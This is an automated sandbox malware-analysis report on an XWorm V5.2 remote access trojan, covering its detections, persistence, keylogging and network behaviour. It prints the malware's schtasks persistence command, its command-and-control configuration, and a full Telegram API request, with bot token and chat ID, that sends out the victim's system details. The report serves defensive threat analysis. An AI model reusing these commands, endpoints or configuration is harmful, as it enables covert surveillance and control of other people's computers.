Edit tour

Windows Analysis Report
XClient.exe.bin.exe

Overview

General Information

Sample name:	XClient.exe.bin.exe
Analysis ID:	1637332
MD5:	5d963e15d3b0a19ffc51dd8eb6560505
SHA1:	132a227fafd2d630fae7c3b5b34efb5186a50d31
SHA256:	a0de7218ac117e5026b352ecc3f783c5786982af49625ba1b32feb08fe967c7b
Tags:	exeuser-TornadoAV_dev
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Telegram RAT

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Contains functionality to log keystrokes (.Net Source)

Drops PE files to the user root directory

Joe Sandbox ML detected suspicious sample

Opens the same file many times (likely Sandbox evasion)

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

XClient.exe.bin.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\XClient.exe.bin.exe" MD5: 5D963E15D3B0A19FFC51DD8EB6560505)

schtasks.exe (PID: 6196 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "checkcoin" /tr "C:\Users\user\checkcoin" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

checkcoin (PID: 6552 cmdline: C:\Users\user\checkcoin MD5: 5D963E15D3B0A19FFC51DD8EB6560505)

OpenWith.exe (PID: 2780 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)

OpenWith.exe (PID: 6556 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)

checkcoin (PID: 6432 cmdline: C:\Users\user\checkcoin MD5: 5D963E15D3B0A19FFC51DD8EB6560505)

checkcoin (PID: 1488 cmdline: C:\Users\user\checkcoin MD5: 5D963E15D3B0A19FFC51DD8EB6560505)

checkcoin (PID: 2968 cmdline: C:\Users\user\checkcoin MD5: 5D963E15D3B0A19FFC51DD8EB6560505)

checkcoin (PID: 5660 cmdline: C:\Users\user\checkcoin MD5: 5D963E15D3B0A19FFC51DD8EB6560505)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://cyber.wtf/2025/02/12/unpacking-pyarmor-v8-scripts/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["https://doberman-proper-bengal.ngrok-free.app"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
XClient.exe.bin.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
XClient.exe.bin.exe	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x78b0:$str01: $VB$Local_Port 0x78a1:$str02: $VB$Local_Host 0x7a86:$str03: get_Jpeg 0x75ba:$str04: get_ServicePack 0x8b0e:$str05: Select * from AntivirusProduct 0x8d0a:$str06: PCRestart 0x8d1e:$str07: shutdown.exe /f /r /t 0 0x8dd0:$str08: StopReport 0x8da6:$str09: StopDDos 0x8ea8:$str10: sendPlugin 0x9054:$str12: -ExecutionPolicy Bypass -File " 0x9179:$str13: Content-length: 5235
XClient.exe.bin.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9538:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x95d5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x96ea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9094:$cnc4: POST / HTTP/1.1

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_XWorm_1	Yara detected XWorm	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\checkcoin	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\checkcoin	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x78b0:$str01: $VB$Local_Port 0x78a1:$str02: $VB$Local_Host 0x7a86:$str03: get_Jpeg 0x75ba:$str04: get_ServicePack 0x8b0e:$str05: Select * from AntivirusProduct 0x8d0a:$str06: PCRestart 0x8d1e:$str07: shutdown.exe /f /r /t 0 0x8dd0:$str08: StopReport 0x8da6:$str09: StopDDos 0x8ea8:$str10: sendPlugin 0x9054:$str12: -ExecutionPolicy Bypass -File " 0x9179:$str13: Content-length: 5235
C:\Users\user\checkcoin	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9538:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x95d5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x96ea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9094:$cnc4: POST / HTTP/1.1

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.3307394999.0000000013011000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.3307394999.0000000013011000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x11ff8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12095:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x121aa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x11b54:$cnc4: POST / HTTP/1.1
00000000.00000000.837866590.0000000000D82000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000000.837866590.0000000000D82000.00000002.00000001.01000000.00000003.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9338:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x93d5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x94ea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8e94:$cnc4: POST / HTTP/1.1
Process Memory Space: XClient.exe.bin.exe PID: 7084	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: XClient.exe.bin.exe PID: 7084	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.XClient.exe.bin.exe.d80000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.0.XClient.exe.bin.exe.d80000.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x78b0:$str01: $VB$Local_Port 0x78a1:$str02: $VB$Local_Host 0x7a86:$str03: get_Jpeg 0x75ba:$str04: get_ServicePack 0x8b0e:$str05: Select * from AntivirusProduct 0x8d0a:$str06: PCRestart 0x8d1e:$str07: shutdown.exe /f /r /t 0 0x8dd0:$str08: StopReport 0x8da6:$str09: StopDDos 0x8ea8:$str10: sendPlugin 0x9054:$str12: -ExecutionPolicy Bypass -File " 0x9179:$str13: Content-length: 5235
0.0.XClient.exe.bin.exe.d80000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9538:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x95d5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x96ea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9094:$cnc4: POST / HTTP/1.1
0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x78b0:$str01: $VB$Local_Port 0x78a1:$str02: $VB$Local_Host 0x7a86:$str03: get_Jpeg 0x75ba:$str04: get_ServicePack 0x8b0e:$str05: Select * from AntivirusProduct 0x8d0a:$str06: PCRestart 0x8d1e:$str07: shutdown.exe /f /r /t 0 0x8dd0:$str08: StopReport 0x8da6:$str09: StopDDos 0x8ea8:$str10: sendPlugin 0x9054:$str12: -ExecutionPolicy Bypass -File " 0x9179:$str13: Content-length: 5235
0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9538:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x95d5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x96ea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9094:$cnc4: POST / HTTP/1.1
0.2.XClient.exe.bin.exe.13019ac0.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.XClient.exe.bin.exe.13019ac0.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x5ab0:$str01: $VB$Local_Port 0x5aa1:$str02: $VB$Local_Host 0x5c86:$str03: get_Jpeg 0x57ba:$str04: get_ServicePack 0x6d0e:$str05: Select * from AntivirusProduct 0x6f0a:$str06: PCRestart 0x6f1e:$str07: shutdown.exe /f /r /t 0 0x6fd0:$str08: StopReport 0x6fa6:$str09: StopDDos 0x70a8:$str10: sendPlugin 0x7254:$str12: -ExecutionPolicy Bypass -File " 0x7379:$str13: Content-length: 5235
0.2.XClient.exe.bin.exe.13019ac0.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7738:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x77d5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x78ea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7294:$cnc4: POST / HTTP/1.1
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\checkcoin, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XClient.exe.bin.exe, ProcessId: 7084, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\checkcoin

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\checkcoin, CommandLine: C:\Users\user\checkcoin, CommandLine|base64offset|contains: , Image: C:\Users\user\checkcoin, NewProcessName: C:\Users\user\checkcoin, OriginalFileName: C:\Users\user\checkcoin, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Users\user\checkcoin, ProcessId: 6552, ProcessName: checkcoin

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\XClient.exe.bin.exe, ProcessId: 7084, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\checkcoin.lnk

Suricata Signatures

ETPRO MALWARE Win32/XWorm Checkin via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T14:41:46.886630+0100	2853685	1	A Network Trojan was detected	192.168.2.7	49681	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T14:41:46.886630+0100	1810007	1	Potentially Bad Traffic	192.168.2.7	49681	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: XClient.exe.bin.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\checkcoin

Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: XClient.exe.bin.exe

Malware Configuration Extractor: Xworm {"C2 url": ["https://doberman-proper-bengal.ngrok-free.app"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\checkcoin

ReversingLabs: Detection: 78%

Multi AV Scanner detection for submitted file

Source: XClient.exe.bin.exe	Virustotal: Detection: 72%			Perma Link
Source: XClient.exe.bin.exe	ReversingLabs: Detection: 78%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: XClient.exe.bin.exe	String decryptor: https://doberman-proper-bengal.ngrok-free.app
Source: XClient.exe.bin.exe	String decryptor: 7000
Source: XClient.exe.bin.exe	String decryptor: <123456789>
Source: XClient.exe.bin.exe	String decryptor: <Xwormmm>
Source: XClient.exe.bin.exe	String decryptor: XWorm V5.2
Source: XClient.exe.bin.exe	String decryptor: USB.exe
Source: XClient.exe.bin.exe	String decryptor: %Userprofile%
Source: XClient.exe.bin.exe	String decryptor: checkcoin

Source: XClient.exe.bin.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49681 version: TLS 1.2

Source: XClient.exe.bin.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49681 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.7:49681 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://doberman-proper-bengal.ngrok-free.app

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

HTTP traffic detected: GET /bot7869137595:AAFxR2yOwe3zrtEQ2gHmo2UJsjisFBJbvSI/sendMessage?chat_id=7795104560&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AD38424BBC747D266F23E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20YWDU7Z%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.18.0Date: Thu, 13 Mar 2025 13:41:46 GMTContent-Type: application/jsonContent-Length: 84Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: XClient.exe.bin.exe, 00000000.00000002.3305389596.0000000003011000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: XClient.exe.bin.exe, checkcoin.0.dr	String found in binary or memory: https://api.telegram.org/bot
Source: checkcoin, 00000014.00000002.2903960216.00000000023E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://doberman-proper-bengal.ngrok-free.app
Source: XClient.exe.bin.exe, 00000000.00000002.3308128690.000000001BFB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doberman-proper-bengal.ngrok-free.app-
Source: XClient.exe.bin.exe, 00000000.00000002.3308439265.000000001C03B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doberman-proper-bengal.ngrok-free.app5
Source: XClient.exe.bin.exe, 00000000.00000002.3308439265.000000001C03B000.00000004.00000020.00020000.00000000.sdmp, XClient.exe.bin.exe, 00000000.00000002.3308128690.000000001BFB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doberman-proper-bengal.ngrok-free.app=
Source: XClient.exe.bin.exe, 00000000.00000002.3308439265.000000001C03B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doberman-proper-bengal.ngrok-free.appB9
Source: XClient.exe.bin.exe, 00000000.00000002.3308439265.000000001C03B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doberman-proper-bengal.ngrok-free.appB95
Source: XClient.exe.bin.exe, 00000000.00000002.3308128690.000000001BFB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doberman-proper-bengal.ngrok-free.appM
Source: XClient.exe.bin.exe, 00000000.00000002.3308128690.000000001BFB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doberman-proper-bengal.ngrok-free.appm

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49681
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49681 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: XClient.exe.bin.exe, XLogger.cs	.Net Code: KeyboardLayout
Source: checkcoin.0.dr, XLogger.cs	.Net Code: KeyboardLayout
Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout

Source: C:\Users\user\Desktop\XClient.exe.bin.exe

Window created: window name: CLIPBRDWNDCLASS

Source: XClient.exe.bin.exe, type: SAMPLE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: XClient.exe.bin.exe, type: SAMPLE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.XClient.exe.bin.exe.d80000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.0.XClient.exe.bin.exe.d80000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.XClient.exe.bin.exe.13019ac0.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.XClient.exe.bin.exe.13019ac0.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.3307394999.0000000013011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.837866590.0000000000D82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\checkcoin, type: DROPPED	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\checkcoin, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Code function: 0_2_00007FFB9AA47EA6	0_2_00007FFB9AA47EA6
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Code function: 0_2_00007FFB9AA48C52	0_2_00007FFB9AA48C52
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Code function: 0_2_00007FFB9AA4156A	0_2_00007FFB9AA4156A
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Code function: 0_2_00007FFB9AA40EE0	0_2_00007FFB9AA40EE0
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Code function: 0_2_00007FFB9AA41DB5	0_2_00007FFB9AA41DB5
Source: C:\Users\user\checkcoin	Code function: 3_2_00007FFB9AA31DB5	3_2_00007FFB9AA31DB5
Source: C:\Users\user\checkcoin	Code function: 3_2_00007FFB9AA3156A	3_2_00007FFB9AA3156A
Source: C:\Users\user\checkcoin	Code function: 7_2_00007FFB9AA61DB5	7_2_00007FFB9AA61DB5
Source: C:\Users\user\checkcoin	Code function: 7_2_00007FFB9AA6156A	7_2_00007FFB9AA6156A
Source: C:\Users\user\checkcoin	Code function: 15_2_00007FFB9AA41DB5	15_2_00007FFB9AA41DB5
Source: C:\Users\user\checkcoin	Code function: 15_2_00007FFB9AA4156A	15_2_00007FFB9AA4156A
Source: C:\Users\user\checkcoin	Code function: 18_2_00007FFB9AA61DB5	18_2_00007FFB9AA61DB5
Source: C:\Users\user\checkcoin	Code function: 18_2_00007FFB9AA6156A	18_2_00007FFB9AA6156A
Source: C:\Users\user\checkcoin	Code function: 20_2_00007FFB9AA71DB5	20_2_00007FFB9AA71DB5
Source: C:\Users\user\checkcoin	Code function: 20_2_00007FFB9AA7156A	20_2_00007FFB9AA7156A

Source: XClient.exe.bin.exe, 00000000.00000002.3307394999.0000000013011000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs XClient.exe.bin.exe
Source: XClient.exe.bin.exe, 00000000.00000002.3302740018.000000000124C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs XClient.exe.bin.exe
Source: XClient.exe.bin.exe, 00000000.00000000.837886616.0000000000D8E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs XClient.exe.bin.exe
Source: XClient.exe.bin.exe	Binary or memory string: OriginalFilenameXClient.exe4 vs XClient.exe.bin.exe

Source: XClient.exe.bin.exe, type: SAMPLE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: XClient.exe.bin.exe, type: SAMPLE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.XClient.exe.bin.exe.d80000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.0.XClient.exe.bin.exe.d80000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.XClient.exe.bin.exe.13019ac0.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.XClient.exe.bin.exe.13019ac0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.3307394999.0000000013011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.837866590.0000000000D82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\checkcoin, type: DROPPED	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\Users\user\checkcoin, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: XClient.exe.bin.exe, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe.bin.exe, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe.bin.exe, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: checkcoin.0.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: checkcoin.0.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: checkcoin.0.dr, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
